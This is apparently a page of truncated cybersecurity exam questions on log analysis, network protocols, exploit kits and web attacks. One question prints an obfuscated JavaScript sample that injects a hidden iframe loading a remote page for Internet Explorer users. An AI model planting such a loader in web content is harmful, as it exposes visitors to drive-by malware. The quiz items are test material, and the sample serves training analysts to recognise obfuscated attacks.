Which log analysis step involves the use of the correlating key? log parsing log normalization log indexing log correlation log analysis Explanation & Hint: The log analysis step that involves…
What are the two general types of log source categories? (Choose two.) network endpoint server client cloud on-prem Explanation & Hint: The two general types of log source categories are:…
Log parsing is considered which part of the overall log analysis process? Log preprocessing Log semantic processing Log normalization Log filtering Explanation & Hint: Log parsing is considered a part…
Which two actions could indicate suspicious behavior that deviates from the baseline and is certainly worth investigating further? (Choose two.) a lot of downloaded data such as software or web…
What is the purpose of using REGEX during PCAP analysis? deliver payloads from PCAP analysis define a search pattern reverse engineer suspicious files log event data and establish baseline Explanation…
Which two statements are true regarding sandbox? (Choose two.) A sandbox allows the file to be executed in a controlled environment. A sandbox is always connected or attached to critical…
Which information in the packet capture could be used to identify the suspicious behavior if the packet is encrypted using IPsec ESP transport mode? payload MAC address IP addresses ESP…
What is the purpose of having a “known-good” profile? configure and test NMS tools audit remote log locations define set of rules that an IDS and an IPS uses to…
Why should Powershell usage be monitored for suspicious activity? Powershell is a very powerful CLI which can start new processes. Powershell is a common tool used by users to perform…
When is the best time to obtain a baseline about the network? as soon as the network is set up without any user traffics on the network before the network…
Which three are SMTP commands? (Choose three.) HELLO QUIT DATA SEND SAVE Explanation & Hint: Among the options provided, the three that are SMTP (Simple Mail Transfer Protocol) commands are:…
DNS listens on which well-known ports? TCP port 53 and UDP port 53 UDP port 67 and UDP port 68 TCP port 21 and TCP port 22 TCP 161 and…
Match the exploit kit with the corresponding explanation. targets Java runtime environment and drops ransomware on target systems ==> neutrino commonly used to drop ransomware on target systems ==> nuclear very versatile…
What is a DNS server that is responsible for the RRs for its zones considered to be? canonical recursive distributed authoritative Explanation & Hint: A DNS server that is responsible…
What is the purpose of HTTP/2 stream prioritization? The application layer negotiates which protocol should be performed over a secure connection. Prioritization allows an endpoint to express how it prefers…
What are two types of Windows memory-based protection measures that can be deployed to combat the use of shellcode? (Choose two.) DEP defender ASLR PowerShell Explanation & Hint: Two types…
Which type of web-based attack uses malicious scripts that are injected into otherwise benign and trusted websites? The malicious scripts are then served to other victims who are visiting the…
What is an HTTP exploit that allows attackers to access restricted directories and execute commands outside of the root directory of the web server? XSS web redirection directory traversal HTTP…
Which option best describes the code that is shown here? <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{})) < /script> obfuscated JavaScript normal JavaScript Unicode-encoded script Punycode-encoded…
Which exploit kit component consists of code that gathers data about a victim’s computer and finds vulnerable applications? payload delivery page landing page downloader page command-and-control page Explanation & Hint:…